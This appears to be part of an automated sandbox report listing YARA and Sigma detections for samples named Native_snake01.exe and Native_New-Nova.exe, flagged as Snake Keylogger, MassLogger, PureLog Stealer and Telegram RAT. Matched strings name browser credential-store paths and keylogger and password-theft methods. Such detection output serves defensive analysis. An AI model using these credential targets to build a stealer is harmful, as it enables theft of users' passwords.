17.3.Native_snake01.exe.680768.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
17.2.Native_snake01.exe.22202f6.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.35d6478.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x47b70:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x47b44:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x47c08:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x47b20:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x47b86:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x47953:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x46edd:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x46406:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x44d68:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x44d37:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
17.2.Native_snake01.exe.49c0000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
9.2.Native_New-Nova.exe.35d6478.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4c41f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x4b91d:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x4bc2b:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data 0x4ca23:$a5: \Kometa\User Data\Default\Login Data
16.2.Native_New-Nova.exe.3450190.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.3450190.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.Native_snake01.exe.2141216.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Native_snake01.exe.2141216.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.Native_snake01.exe.2141216.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.3.Native_New-Nova.exe.5993e8.0.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.3.Native_New-Nova.exe.5993e8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.3.Native_New-Nova.exe.5993e8.0.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.3.Native_New-Nova.exe.5993e8.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.3.Native_New-Nova.exe.5993e8.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.3.Native_New-Nova.exe.5993e8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
9.3.Native_New-Nova.exe.5993e8.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data
9.2.Native_New-Nova.exe.3600190.7.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.3600190.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.3600190.7.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.3600190.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.3600190.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.Native_snake01.exe.22202f6.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.49d0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
9.2.Native_New-Nova.exe.23e0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.3450190.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c058:$a1: get_encryptedPassword 0x1c02c:$a2: get_encryptedUsername 0x1c0f0:$a3: get_timePasswordChanged 0x1c008:$a4: get_passwordField 0x1c06e:$a5: set_encryptedPassword 0x1be3b:$a7: get_logins 0x1b3c5:$a8: GetOutlookPasswords 0x1a8ee:$a9: StartKeylogger 0x19250:$a10: KeyLoggerEventArgs 0x1921f:$a11: KeyLoggerEventArgsEventHandler 0x1bf0f:$a13: _encryptedPassword
10.2.Native_snake01.exe.21402f6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Native_snake01.exe.21402f6.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.Native_snake01.exe.21402f6.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.Native_snake01.exe.21402f6.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
10.2.Native_snake01.exe.21402f6.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.21402f6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
9.2.Native_New-Nova.exe.23e0f08.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.23e0f08.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.23e0f08.3.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.23e0f08.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.23e0f08.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.23e0f08.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c058:$a1: get_encryptedPassword 0x1c02c:$a2: get_encryptedUsername 0x1c0f0:$a3: get_timePasswordChanged 0x1c008:$a4: get_passwordField 0x1c06e:$a5: set_encryptedPassword 0x1be3b:$a7: get_logins 0x1b3c5:$a8: GetOutlookPasswords 0x1a8ee:$a9: StartKeylogger 0x19250:$a10: KeyLoggerEventArgs 0x1921f:$a11: KeyLoggerEventArgsEventHandler 0x1bf0f:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.23e0f08.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20907:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1fe05:$a3: \Google\Chrome\User Data\Default\Login Data 0x20113:$a4: \Orbitum\User Data\Default\Login Data 0x20f0b:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.4930000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
17.3.Native_snake01.exe.680768.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
10.2.Native_snake01.exe.4930000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
9.2.Native_New-Nova.exe.3600190.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
17.2.Native_snake01.exe.22202f6.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
9.2.Native_New-Nova.exe.3600190.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data
9.2.Native_New-Nova.exe.23e0000.4.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.23e0000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.50b0000.8.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.50b0000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.50b0000.8.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.50b0000.8.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.50b0000.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.50b0000.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c058:$a1: get_encryptedPassword 0x1c02c:$a2: get_encryptedUsername 0x1c0f0:$a3: get_timePasswordChanged 0x1c008:$a4: get_passwordField 0x1c06e:$a5: set_encryptedPassword 0x1be3b:$a7: get_logins 0x1b3c5:$a8: GetOutlookPasswords 0x1a8ee:$a9: StartKeylogger 0x19250:$a10: KeyLoggerEventArgs 0x1921f:$a11: KeyLoggerEventArgsEventHandler 0x1bf0f:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.3426478.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x47b70:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x47b44:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x47c08:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x47b20:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x47b86:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x47953:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x46edd:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x46406:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x44d68:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x44d37:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
10.2.Native_snake01.exe.4930f20.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
10.2.Native_snake01.exe.49d0000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
16.2.Native_New-Nova.exe.3450190.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20907:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1fe05:$a3: \Google\Chrome\User Data\Default\Login Data 0x20113:$a4: \Orbitum\User Data\Default\Login Data 0x20f0b:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.2141216.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
10.2.Native_snake01.exe.2141216.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
16.3.Native_New-Nova.exe.59f268.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.4930000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.Native_snake01.exe.4930000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.Native_snake01.exe.4930000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34abe:$a1: get_encryptedPassword 0x34a92:$a2: get_encryptedUsername 0x34b56:$a3: get_timePasswordChanged 0x34a6e:$a4: get_passwordField 0x34ad4:$a5: set_encryptedPassword 0x348a1:$a7: get_logins 0x30108:$a10: KeyLoggerEventArgs 0x300d7:$a11: KeyLoggerEventArgsEventHandler 0x34975:$a13: _encryptedPassword
10.2.Native_snake01.exe.4930000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ed13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e3b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e613:$a4: \Orbitum\User Data\Default\Login Data 0x3eff2:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.4930000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32688:$s1: UnHook 0x32624:$s2: SetHook 0x3265d:$s3: CallNextHook 0x325ec:$s4: _hook
10.2.Native_snake01.exe.2141216.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Native_snake01.exe.2141216.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.Native_snake01.exe.2141216.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.Native_snake01.exe.2141216.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
16.2.Native_New-Nova.exe.2142746.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.2142746.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.2142746.1.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.2142746.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.2142746.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.2142746.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.2142746.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data
9.2.Native_New-Nova.exe.23e0000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.Native_snake01.exe.2141216.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.50b0000.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20907:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1fe05:$a3: \Google\Chrome\User Data\Default\Login Data 0x20113:$a4: \Orbitum\User Data\Default\Login Data 0x20f0b:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.2141216.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
17.3.Native_snake01.exe.680768.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Native_snake01.exe.21402f6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Native_snake01.exe.21402f6.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.Native_snake01.exe.21402f6.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.Native_snake01.exe.49c0f20.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.23e0000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ed60:$a1: get_encryptedPassword 0x1ed34:$a2: get_encryptedUsername 0x1edf8:$a3: get_timePasswordChanged 0x1ed10:$a4: get_passwordField 0x1ed76:$a5: set_encryptedPassword 0x1eb43:$a7: get_logins 0x1e0cd:$a8: GetOutlookPasswords 0x1d5f6:$a9: StartKeylogger 0x1bf58:$a10: KeyLoggerEventArgs 0x1bf27:$a11: KeyLoggerEventArgsEventHandler 0x1ec17:$a13: _encryptedPassword
10.2.Native_snake01.exe.2141216.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
9.2.Native_New-Nova.exe.23e0000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2360f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x22b0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x22e1b:$a4: \Orbitum\User Data\Default\Login Data 0x23c13:$a5: \Kometa\User Data\Default\Login Data
17.2.Native_snake01.exe.22202f6.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.Native_snake01.exe.22202f6.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.Native_snake01.exe.22202f6.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.Native_snake01.exe.49c0f20.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
17.3.Native_snake01.exe.680768.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.3.Native_snake01.exe.680768.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.Native_snake01.exe.21402f6.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34abe:$a1: get_encryptedPassword 0x34a92:$a2: get_encryptedUsername 0x34b56:$a3: get_timePasswordChanged 0x34a6e:$a4: get_passwordField 0x34ad4:$a5: set_encryptedPassword 0x348a1:$a7: get_logins 0x30108:$a10: KeyLoggerEventArgs 0x300d7:$a11: KeyLoggerEventArgsEventHandler 0x34975:$a13: _encryptedPassword
17.3.Native_snake01.exe.680768.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
17.2.Native_snake01.exe.22202f6.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34abe:$a1: get_encryptedPassword 0x34a92:$a2: get_encryptedUsername 0x34b56:$a3: get_timePasswordChanged 0x34a6e:$a4: get_passwordField 0x34ad4:$a5: set_encryptedPassword 0x348a1:$a7: get_logins 0x30108:$a10: KeyLoggerEventArgs 0x300d7:$a11: KeyLoggerEventArgsEventHandler 0x34975:$a13: _encryptedPassword
17.3.Native_snake01.exe.680768.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.21402f6.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ed13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e3b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e613:$a4: \Orbitum\User Data\Default\Login Data 0x3eff2:$a5: \Kometa\User Data\Default\Login Data
17.3.Native_snake01.exe.680768.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
10.2.Native_snake01.exe.21402f6.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32688:$s1: UnHook 0x32624:$s2: SetHook 0x3265d:$s3: CallNextHook 0x325ec:$s4: _hook
17.2.Native_snake01.exe.22202f6.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ed13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e3b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e613:$a4: \Orbitum\User Data\Default\Login Data 0x3eff2:$a5: \Kometa\User Data\Default\Login Data
16.2.Native_New-Nova.exe.3426478.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4c41f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x4b91d:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x4bc2b:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data 0x4ca23:$a5: \Kometa\User Data\Default\Login Data
17.2.Native_snake01.exe.22202f6.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32688:$s1: UnHook 0x32624:$s2: SetHook 0x3265d:$s3: CallNextHook 0x325ec:$s4: _hook
17.2.Native_snake01.exe.49c0f20.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
Click to see the 389 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

